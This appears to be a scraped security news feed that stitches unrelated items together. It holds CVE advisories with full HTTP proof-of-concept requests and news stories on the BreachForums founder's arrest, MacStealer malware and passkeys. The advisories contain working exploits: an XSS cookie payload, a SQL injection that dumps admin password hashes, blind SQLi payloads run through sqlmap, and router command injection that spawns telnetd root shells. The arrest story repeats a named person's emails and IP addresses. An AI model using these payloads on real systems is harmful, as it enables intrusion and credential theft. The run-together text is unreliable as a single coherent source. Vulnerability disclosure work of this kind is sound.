SourceCodester Water Billing System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the lastname text box under the Add Client module.

**WaterBilling-System v1.0 by itsourcecode.com has Cross-site Scripting (XSS)**

Vul\_Author: Kai Wang

Login Account:jude Password:123

vendors: https://itsourcecode.com/free-projects/php-project/billing-system-in-php-with-source-code/

Vulnerability File: /billing/addclient1.php

Vulnerability location: /billing/addclient1.php HTTP/1.1

\[+\] Payload: <script>alert(document.cookie)</script>

Tested on Windows 10, phpStudy

There is an example with alert:

    POST /billing/addclient1.php HTTP/1.1
    Host: 10.12.180.79
    Content-Length: 178
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://10.12.180.79
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.41
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Referer: http://10.12.180.79/billing/clients.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
    Cookie: PHPSESSID=d4me9tekbcuef2k8k1qupv9i0t
    Connection: close
    
    lname=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&fname=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&mi=M&address=address&contact=test&meterReader=test&add=ADD
    

When you enter the system,click "add client"

input a XSS script in the lastname input boxes,such as "<script>alert(document.cookie)</script>",it will expose cookie.

click add,and you will obtain its cookie.

CVE-2023-27241: GitHub - kaikai-11/WaterBilling-System

Conor Brian Fitzpatrick, the 20-year-old founder and the administrator of the now-defunct BreachForums has been formally charged in the U.S. with conspiracy to commit access device fraud.
If proven guilty, Fitzpatrick, who went by the online moniker "pompompurin," faces a maximum penalty of up to five years in prison. He was arrested on March 15, 2023.
"Cybercrime victimizes and steals financial

Conor Brian Fitzpatrick, the 20-year-old founder and the administrator of the now-defunct BreachForums has been formally charged in the U.S. with conspiracy to commit access device fraud.

If proven guilty, Fitzpatrick, who went by the online moniker "pompompurin," faces a maximum penalty of up to five years in prison. He was arrested on March 15, 2023.

"Cybercrime victimizes and steals financial and personal information from millions of innocent people," said U.S. Attorney Jessica D. Aber for the Eastern District of Virginia. "This arrest sends a direct message to cybercriminals: your exploitative and illegal conduct will be discovered, and you will be brought to justice."

The development comes days after Baphomet, the individual who had taken over the responsibilities of BreachForums, shut down the website, citing concerns that law enforcement may have obtained access to its backend. The Department of Justice (DoJ) has since confirmed that it conducted a disruption operation that caused the illicit criminal platform to go offline.

BreachForums, per Fitzpatrick, was created in March 2022 to fill the void left by RaidForums, which was taken down a month before as part of an international law enforcement operation.

It served as a marketplace for trading hacked or stolen data, including bank account information, Social Security numbers, hacking tools, and databases containing personally identifying information (PII).

In new court documents released on March 24, 2023, it has come to light that undercover agents working for the U.S. Federal Bureau of Investigation (FBI) purchased five sets of data offered for sale, with Fitzpatrick acting as a middleman to complete the transactions.

Fitzpatrick's links to pompompurin came from nine IP addresses associated with service provider Verizon that Pompompurin used to access the pompompurin account on RaidForums and a major OPSEC failure on the defendant's part.

"The RaidForums records also contained \[...\] communication between pompompurin and omnipotent \[the RaidForums administrator\] on or about November 28, 2020, in which pompompurin specifically mentions to omnipotent that he had searched for the email address conorfitzpatrick02@gmail.com and name 'conorfitzpatrick' within a database of breached data from 'ai.type,'" according to the affidavit.

It's worth noting that the Android keyboard app Ai.type suffered a data breach in December 2017, leading to the accidental leak of emails, phone numbers, and locations associated with 31 million users.

Further data obtained from Google reveal that Fitzpatrick registered a new Google account with the email address conorfitzpatrick2002@gmail.com in May 2019 to replace conorfitzpatrick02@gmail.com, which was closed around April 2020.

What's more, the "old" conorfitzpatrick02@gmail.com email address is present in the breached Ai.type database legitimate data breach notification site Have I Been Pwned.

"The recovery email address for conorfitzpatrick2002@gmail.com was funmc59tm@gmail.com," the affidavit reads. "Subscriber records for this account reveal that the account was registered under the name 'a a,' and created on or about December 28, 2018 from the IP address 74.101.151.4."

"Records received from Verizon, in turn, revealed that IP address 74.101.151.4 was registered to a customer with the last name Fitzpatrick at \[a residence located on Union Avenue in Peekskill, New York\]."

The investigation also turned up evidence of Fitzpatrick logging into various virtual private network (VPN) providers from September 2021 to May 2022 to obscure his true location and connect to different accounts, including the Google Account linked to conorfitzpatrick2002@gmail.com.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

One of those masked IP addresses was further used to sign in to a Zoom account under the name of "pompompurin" with an e-mail address of pompompurin@riseup.net, records obtained by the FBI from Zoom reveal. Interestingly, Fitzpatrick is said to have used the pompompurin@riseup.net email address to register on RaidForums.

Also unearthed by the agency is a Purse.io cryptocurrency account that was registered with the email address conorfitzpatrick2002@gmail.com and "was funded exclusively by a Bitcoin address that pompompurin had discussed in posts on RaidForums. Records from Purse.io showed that the account was used to purchase "several items" and ship them to his address in Peekskill.

On top of that, the FBI secured a warrant to get his real-time cell phone GPS location from Verizon, allowing the authorities to determine that he was logged in to BreachForums while his phone's physical location showed he was at his home.

But that's not all. In yet another OPSEC error, Fitzpatrick made the mistake of logging into BreachForums on June 27, 2022, without using a VPN service or the TOR browser, thereby exposing the real IP address (69.115.201.194).

Based on data received from Apple, the same IP address was used to access the iCloud account about 97 times between May 19, 2022, and June 2, 2022.

"Fitzpatrick has used the same VPNs and IP addresses to log into the email account conorfitzpatrick2002@gmail.com, the Conor Fitzpatrick Purse.io account, the pompompurin account on RaidForums, and the pompompurin account on BreachForums, among other accounts," FBI's John Longmire said.

In the aftermath of the release of the affidavit, Baphomet said "you shouldn't trust anyone to handle your own OPSEC," adding "I never made this assumption as an admin, and no one else should have either."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

20-Year-Old BreachForums Founder Faces Up to 5 Years in Prison

Aero CMS version 0.0.1 suffers from multiple remote SQL injection vulnerabilities. Original discovery of this issue in this version is attributed to nu11secur1ty in August of 2022.

    # Exploit Title: Aero CMS v0.0.1 - SQL Injection (no auth)# Date: 15/10/2022# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://github.com/MegaTKC/AeroCMS# Software Link: https://github.com/MegaTKC/AeroCMS# Version: 0.0.1# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23## Example SQL Injection-----------------------------------------------------------------------------------------------------------------------Param: search-----------------------------------------------------------------------------------------------------------------------Req sql ini detect-----------------------------------------------------------------------------------------------------------------------POST /AeroCMS-master/search.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57Origin: http://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: http://127.0.0.1/AeroCMS-master/Content-Type: application/x-www-form-urlencodedAccept-Language: en-US;q=0.9,en;q=0.8Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 21search=245692'&submit=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 03:07:06 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40X-Powered-By: PHP/5.6.40Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheContent-Length: 3466Connection: closeContent-Type: text/html; charset=UTF-8[...]Query failed You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%'' at line 1-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /AeroCMS-master/search.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57Origin: http://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: http://127.0.0.1/AeroCMS-master/Content-Type: application/x-www-form-urlencodedAccept-Language: en-US;q=0.9,en;q=0.8Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 21search=245692''&submit=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 03:07:10 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40X-Powered-By: PHP/5.6.40Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 94216[...]-----------------------------------------------------------------------------------------------------------------------Req exploiting sql ini get data admin-----------------------------------------------------------------------------------------------------------------------POST /AeroCMS-master/search.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57Origin: http://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: http://127.0.0.1/AeroCMS-master/Content-Type: application/x-www-form-urlencodedAccept-Language: en-US;q=0.9,en;q=0.8Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 113search=245692'+union+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12+from+users#&submit=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 05:40:05 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40X-Powered-By: PHP/5.6.40Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 101144[...]                    <a href="#">admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne,admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne</a>[...]-----------------------------------------------------------------------------------------------------------------------Other URL and params-----------------------------------------------------------------------------------------------------------------------/AeroCMS-master/admin/posts.php [post_title]/AeroCMS-master/admin/posts.php [filename]/AeroCMS-master/admin/profile.php [filename]/AeroCMS-master/author_posts.php [author]/AeroCMS-master/category.php [category]/AeroCMS-master/post.php [p_id]/AeroCMS-master/search.php [search]/AeroCMS-master/admin/categories.php [cat_title]/AeroCMS-master/admin/categories.php [phpwcmsBELang cookie]/AeroCMS-master/admin/posts.php [post_content]/AeroCMS-master/admin/posts.php [p_id]/AeroCMS-master/admin/posts.php [post_category_id]/AeroCMS-master/admin/posts.php [post_title]/AeroCMS-master/admin/posts.php [reset]

Aero CMS 0.0.1 SQL Injection

A new information-stealing malware has set its sights on Apple's macOS operating system to siphon sensitive information from compromised devices.
Dubbed MacStealer, it's the latest example of a threat that uses Telegram as a command-and-control (C2) platform to exfiltrate data. It primarily affects devices running macOS versions Catalina and later running on M1 and M2 CPUs.
"MacStealer has the

Data Safety / Endpoint Security

A new information-stealing malware has set its sights on Apple's macOS operating system to siphon sensitive information from compromised devices.

Dubbed **MacStealer**, it's the latest example of a threat that uses Telegram as a command-and-control (C2) platform to exfiltrate data. It primarily affects devices running macOS versions Catalina and later running on M1 and M2 CPUs.

"MacStealer has the ability to steal documents, cookies from the victim's browser, and login information," Uptycs researchers Shilpesh Trivedi and Pratik Jeware said in a new report.

First advertised on online hacking forums at the start of the month, it is still a work in progress, with the malware authors planning to add features to capture data from Apple's Safari browser and the Notes app.

In its current form, MacStealer is designed to extract iCloud Keychain data, passwords and credit card information from browsers like Google Chrome, Mozilla Firefox, and Brave. It also features support for harvesting Microsoft Office files, images, archives, and Python scripts.

The exact method used to deliver the malware is not known, but it is propagated as a DMG file (weed.dmg) that, when executed, opens a fake password prompt to harvest the passwords under the guise of seeking access to the System Settings app.

MacStealer is one of several info-stealers that have surfaced just over the past few months and adds to an already large number of similar tools currently in the wild.

This also includes another piece of new C#-based malware called HookSpoofer that's inspired by StormKitty and comes with keylogging and clipper abilities and transmits the stolen data to a Telegram bot.

Another browser cookie-stealing malware of note is Ducktail, which also uses a Telegram bot to exfiltrate data and re-emerged in mid-February 2023 with improved tactics to sidestep detection.

This involves "changing the initial infection from an archive containing a malicious executable to an archive containing a malicious LNK file that would start the infection chain," Deep Instinct researcher Simon Kenin said earlier this month.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

Stealer malware is typically spread through different channels, including email attachments, bogus software downloads, and other social engineering techniques.

To mitigate such threats, it's recommended that users keep their operating system and security software up to date and avoid downloading files or clicking links from unknown sources.

"As Macs have become increasingly popular in the enterprise among leadership and development teams, the more important the data stored on them is to attackers," SentinelOne researcher Phil Stokes said last week.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New MacStealer macOS Malware Steals iCloud Keychain Data and Passwords

Categories: Podcast
This week on Lock and Code, we speak with Anna Pobletts about the death of passwords, and how passkeys can become the non-compromising fix to authentication's biggest problems. 



(Read more...)




The post Solving the password’s hardest problem with passkeys, featuring Anna Pobletts appeared first on Malwarebytes Labs.

How many passwords do you have? If you're at all like our Lock and Code host David Ruiz, that number hovers around 200. But the important follow up question is: How many of those passwords can you actually remember on your own? Prior studies suggest a number that sounds nearly embarrassing—probably around six. 

After decades of requiring it, it turns out that the password has problems, the biggest of which is that when users are forced to create a password for every online account, they resort to creating easy-to-remember passwords that are built around their pets' names, their addresses, even the word "password." Those same users then re-use those weak passwords across multiple accounts, opening them up to easy online attacks that rely on entering the compromised credentials from one online account to crack into an entirely separate online account. 

As if that weren't dangerous enough, passwords themselves are vulnerable to phishing attacks, where hackers can fraudulently pose as businesses that ask users to enter their login information on a website that looks legitimate, but isn't. 

Thankfully, the cybersecurity industry has built a few safeguards around password use, such as multifactor authentication, which requires a second form of approval from a user beyond just entering their username and password. But, according to 1Password Head of Passwordless Anna Pobletts, many attempts around improving and replacing passwords have put extra work into the hands of users themselves:

> "There's been so many different attempts in the last 10, 20 years to replace passwords or improve passwords and the security around. But all of these attempts have been at the expense of the user."

For Pobletts, who is our latest guest on the Lock and Code podcast, there is a better option now available that does not trade security for ease-of-use. Instead, it ensures that the secure option for users is _also_ the easy option. That latest option is the use of "passkeys." 

Resistant to phishing attacks, secured behind biometrics, and free from any requirement by users to create new ones on their own, passkeys could dramatically change our security for the better. 

Today, we speak with Pobletts about whether we'll ever truly live in a passwordless future, along with what passkeys are, how they work, and what industry could see huge benefit from implementation. Tune in now. 

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Solving the password’s hardest problem with passkeys, featuring Anna Pobletts

RG-EW1200G PRO Wireless Routers EW_3.0(1)B11P204, RG-EW1800GX PRO Wireless Routers EW_3.0(1)B11P204, and RG-EW3200GX PRO Wireless Routers EW_3.0(1)B11P204 were discovered to contain multiple command injection vulnerabilities via the data.ip, data.protocal, data.iface and data.package parameters in the runPackDiagnose function of diagnose.lua.

**Information**

**Vendor of the products:**    Ruijie Networks

**Vendor's website:**    https://www.ruijienetworks.com

**Reported by:**    WangJincheng(wjcwinmt@outlook.com)

**Affected products:**

RG-EW1200G PRO Wireless Routers

RG-EW1800GX PRO Wireless Routers

RG-EW3200GX PRO Wireless Routers

**Affected firmware version:**

EW\_3.0(1)B11P204 (the latest release version)

**Firmware download address:**   

RG-EW1200G PRO Wireless Routers

RG-EW1800GX PRO Wireless Routers

RG-EW3200GX PRO Wireless Routers

**Overview**

Ruijie Networks RG-EW PRO Series Wireless Routers EW_3.0(1)B11P204 was discovered to contain a command injection vulnerability via the data.ip, data.protocal, data.iface and data.package parameters in the runPackDiagnose function of diagnose.lua. Successful exploit could allow an authorized attacker to execute arbitrary commands on remote devices.

**Vulnerability details**

**The vulnerability was detected in the file /usr/lib/lua/luci/modules/diagnose.lua.**

It is easy to see that all four fields data.ip, data.protocal, data.iface and data.package will eventually be concatenated into the _shell variable by the %s formatting string and executed as arguments to the doShell function.

In the file /usr/lib/lua/luci/utils/tool.lua. Notice that in the doShell function, some dangerous characters are filtered before the command is executed. However, **the command delimiter \n is not filtered**.

Therefore, we can use \n as the command separator, inject malicious commands into the data.ip, data.protocal, data.iface and data.package fields, and execute them (In JSON data, \n will be converted to the Unicode encode \u000a, so it's also okay to use \u000a as the separator).

**Poc**

Send the following request message.

    POST /cgi-bin/luci/api/diagnose?auth=xxx HTTP/1.1
    Host: 192.168.110.1
    Content-Length: 218
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
    Content-type: application/json
    Accept: */*
    Origin: http://192.168.110.1
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: __APP_LANG__=zh_cn
    Connection: close
    
    {"method":"runPackDiagnose","params":{"ip":"\ntelnetd -l /bin/sh -p 1111\n","protocal":"\ntelnetd -l /bin/sh -p 2222\n","iface":"\ntelnetd -l /bin/sh -p 3333\n","package":"\ntelnetd -l /bin/sh -p 4444\n","size":"666"}}
    

**Attack Demo**

Use BurpSuite to send the above POC.

Then, the attacker can log in to the remote device directly through telnet and control it entirely (remote login through port 2222, 3333 or 4444 is also available).

CVE-2023-27796: my-vuls/RG-EW PRO Series at main · winmt/my-vuls

Plus: The “Clop” gang's ransomware spree, the DC Health Link breach comes into focus, and more.

A US House of Representatives hearing this week about the social media app TikTok did little to clarify lawmaker's specific concerns about the potential national security risks associated with the wildly popular app, but it did vividly underscore the country’s lack of federal data privacy legislation. WIRED also discovered that TikTok paid for influencers popular on its platform to attend a DC rally in support of the service ahead of the hearing. 

Meanwhile, as a possible indictment of former US president Donald Trump looms in New York state, internet users began generating AI images of Trump being arrested, but there are ways to tell that they're fake. WIRED examined the increasingly aggressive and desperate tactics of Iran's government-backed hackers amid mass protest and unrest in the country. Citizen sleuths around the world are using open source intelligence to separate fact from fiction in the mystery of who sabotaged the Nord Stream pipeline. And vulnerabilities keep showing up in ultra-popular photo cropping tools, exposing a host of cropped images all over the world where some or all of the original image can be recovered.

Plus, if you want to know what it's like to be investigated by the US Secret Service—and how to avoid that particular pleasure—we have a full account.

And there's more. Each week, we round up the security news we didn’t cover in-depth ourselves. Click the headlines to read the full stories, and stay safe out there.

People living in the Indian state of Punjab grappled with an internet shutdown for days after police imposed a connectivity blackout while searching for the Sikh activist Amritpal Singh. Singh is a member of the Sikh Waris Punjab De movement and recently evaded arrest. More than 100 of his supporters have been arrested. Punjab's 27 million inhabitants faced mobile data and SMS blocking as well as traffic filtering on certain websites and services. For example, the government appeared to have blocked access to prominent Sikh Twitter accounts, including that of poet Rupi Kaur and the nonprofit United Sikhs. “Punjab Police India continued its crackdown on Waris Punjab De elements wanted on criminal charges,” the government of Punjab said in a Facebook post on Monday. “Amritpal Singh remains a fugitive, and efforts are being made to arrest him.” Protests have erupted in Punjab and around the world over law enforcement treatment of Sikh Waris Punjab De and the internet shutdown.

A vulnerability in file transfer software from Fortra known as GoAnywhere has been repeatedly exploited by the notorious, Russia-based Clop ransomware group to target dozens or possibly more than a hundred victims in recent days. The cybercrminal group has added entries on numerous organizations to its dark web site, where Clop attempts to extort money from victims by publishing samples of data they've stolen and threatening to leak more if targets don't pay. TechCrunch confirmed on Thursday that the City of Toronto is one of the victims of the spree. “Today, the City of Toronto has confirmed that unauthorized access to City data did occur through a third-party vendor. The access is limited to files that were unable to be processed through the third-party secure file transfer system," officials said in a statement. TechCrunch has also uncovered details about problems with Fortra's response to the discovery of the vulnerability.

The company that runs the Washington DC health insurance marketplace DC Health Link suffered a breach earlier this month that exposed sensitive and personal data from tens of thousands of area customers, including from some US lawmakers and congressional staff. The information included names, email addresses, dates of birth, mail addresses, Social Security numbers, and policy details. The DC Health Benefit Exchange Authority acknowledged the breach on March 7. The entity that has claimed credit for the breach, who goes by the handle “Denfur,” posted samples of data from the attack on BreachForums. Denfur subsequently posted “Glory to Russia!” and that the “intended target was US politicians and members of US government." In an interview with CyberScoop on an encrypted chat service, Denfur claimed not to be concerned about suffering repercussions from law enforcement. “If anything, I’m more worried about my country trying to do a favour for the US and myself or group becoming a sort of bargaining chip,” Denfur said. “The current time brings uncertainty.”

The alleged “pompompurin” administrator of the popular cybercriminal public square BreachForums—the same site Denfur used against DC Health Link—was arrested in New York state earlier this month, but a new leader known as “Baphomet” had come forward, claiming to have a plan to keep the platform going. On Tuesday, though, Baphomet changed course, claiming that someone had gained access to the BreachForums backend and that law enforcement may now control pompompurin's privileged administrator accounts. “This will be my final update on Breached, as I've decided to shut it down,” Baphomet wrote. “I'm aware this news will not please anyone, but it's the only safe decision now that I've confirmed that the glowies likely have access to Poms machine.”

India Shut Down Mobile Internet in Punjab Amid Manhunt for Amritpal Singh

Online Graduate Tracer System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Online Graduate Tracer System - Multiple SQLi# Date: 24/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/15904/online-graduate-tracer-system-college-ict-alumni.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/tracking.zip# Version: 1.0# Tested on: Windows, Linux## Description A Blind SQL injection vulnerability in the fill-in forms of Online Graduate Tracer System allows remote unauthenticated attackers to execute remote arbitrary SQL commands through "age" parameter. ## Request PoC```POST /tracking/ HTTP/1.1Host: 192.168.1.100Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.100/tracking/Content-Type: application/x-www-form-urlencodedContent-Length: 666fullname=TKeljbcD&age=24'&sex=&dob=11%2f11%2f1992&cs=&religion=&street=518287&barangay=933877&municipal=149726&province=293419&region=&zipcode=21788&country=767093&course=&batch=&facebook=329348&twitter=488487&phonenumber=197-436-9799&email=dKYxqIen@burpcollaborator.net&estatus=Employed&organization=&profession=503409&type=Working+Fulltime&location=local&location=abroad&status=Permanent&status=Contractual&status=Casual&status=Others&number=1-5+yrs&income=359935&relate=Yes&sreason=621051&nature=792251&company=597673&num=0-5+yrs&num=6-10+yrs&num=10-15+yrs&num=16+yrs+above&mincome=325978&reason=992014&consider=Yes&submit=```This request causes a Fatal error. Adding "'%2b(select*from(select(sleep(10)))a)%2b'" to the end of "age" parameter, the response to request was 200 status code with message of OK, but 20 seconds later, which indicates that our sleep 10 command works. ```POST /tracking/ HTTP/1.1Host: 192.168.1.100Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.100/tracking/Content-Type: application/x-www-form-urlencodedContent-Length: 666fullname=TKeljbcD&age=24'%2b(select*from(select(sleep(10)))a)%2b'&sex=&dob=11%2f11%2f1992&cs=&religion=&street=518287&barangay=933877&municipal=149726&province=293419&region=&zipcode=21788&country=767093&course=&batch=&facebook=329348&twitter=488487&phonenumber=197-436-9799&email=dKYxqIen@burpcollaborator.net&estatus=Employed&organization=&profession=503409&type=Working+Fulltime&location=local&location=abroad&status=Permanent&status=Contractual&status=Casual&status=Others&number=1-5+yrs&income=359935&relate=Yes&sreason=621051&nature=792251&company=597673&num=0-5+yrs&num=6-10+yrs&num=10-15+yrs&num=16+yrs+above&mincome=325978&reason=992014&consider=Yes&submit=```## Exploit with sqlmapSave the request from burp to file ```┌──(root㉿caesar)-[/home/kali/Workstation/sts]└─# sqlmap -r sqli.txt -p 'age' --batch --dbs --level=3 --risk=2---snip---[01:53:49] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'POST parameter 'age' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 630 HTTP(s) requests:---Parameter: age (POST)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: fullname=TKeljbcD&age=24' RLIKE (SELECT (CASE WHEN (6534=6534) THEN 24 ELSE 0x28 END)) AND 'ATRa'='ATRa&sex=&dob=11/11/1992&cs=&religion=&street=518287&barangay=933877&municipal=149726&province=293419&region=&zipcode=21788&country=767093&course=&batch=&facebook=329348&twitter=488487&phonenumber=197-436-9799&email=dKYxqIen@burpcollaborator.net&estatus=Employed&organization=&profession=503409&type=Working Fulltime&location=local&location=abroad&status=Permanent&status=Contractual&status=Casual&status=Others&number=1-5 yrs&income=359935&relate=Yes&sreason=621051&nature=792251&company=597673&num=0-5 yrs&num=6-10 yrs&num=10-15 yrs&num=16 yrs above&mincome=325978&reason=992014&consider=Yes&submit=    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: fullname=TKeljbcD&age=24' AND (SELECT 9933 FROM(SELECT COUNT(*),CONCAT(0x7170716271,(SELECT (ELT(9933=9933,1))),0x7178767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'PwMK'='PwMK&sex=&dob=11/11/1992&cs=&religion=&street=518287&barangay=933877&municipal=149726&province=293419&region=&zipcode=21788&country=767093&course=&batch=&facebook=329348&twitter=488487&phonenumber=197-436-9799&email=dKYxqIen@burpcollaborator.net&estatus=Employed&organization=&profession=503409&type=Working Fulltime&location=local&location=abroad&status=Permanent&status=Contractual&status=Casual&status=Others&number=1-5 yrs&income=359935&relate=Yes&sreason=621051&nature=792251&company=597673&num=0-5 yrs&num=6-10 yrs&num=10-15 yrs&num=16 yrs above&mincome=325978&reason=992014&consider=Yes&submit=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: fullname=TKeljbcD&age=24' AND (SELECT 7274 FROM (SELECT(SLEEP(5)))gxIn) AND 'maqj'='maqj&sex=&dob=11/11/1992&cs=&religion=&street=518287&barangay=933877&municipal=149726&province=293419&region=&zipcode=21788&country=767093&course=&batch=&facebook=329348&twitter=488487&phonenumber=197-436-9799&email=dKYxqIen@burpcollaborator.net&estatus=Employed&organization=&profession=503409&type=Working Fulltime&location=local&location=abroad&status=Permanent&status=Contractual&status=Casual&status=Others&number=1-5 yrs&income=359935&relate=Yes&sreason=621051&nature=792251&company=597673&num=0-5 yrs&num=6-10 yrs&num=10-15 yrs&num=16 yrs above&mincome=325978&reason=992014&consider=Yes&submit=---[01:53:50] [INFO] the back-end DBMS is MySQLweb application technology: PHP 8.2.0, Apache 2.4.54back-end DBMS: MySQL >= 5.0 (MariaDB fork)---snip---```## The "barangay", "batch", "company", "country", "course", "cs", "dob", "email", "estatus", "facebook", "fullname", "income", "location", "mincome", "municipal", "nature", "number", "organization", "phonenumber", "profession", "province", "region", "relate", "religion", "sex", "sreason", "status", "street", "twitter", "type" and "zipcode" parameters in the POST requests are also vulnerable. They can be exploited in the same way.

Online Graduate Tracer System 1.0 SQL Injection

Sales Tracker Management System version 1.0 suffers from a cross site scripting vulnerability.

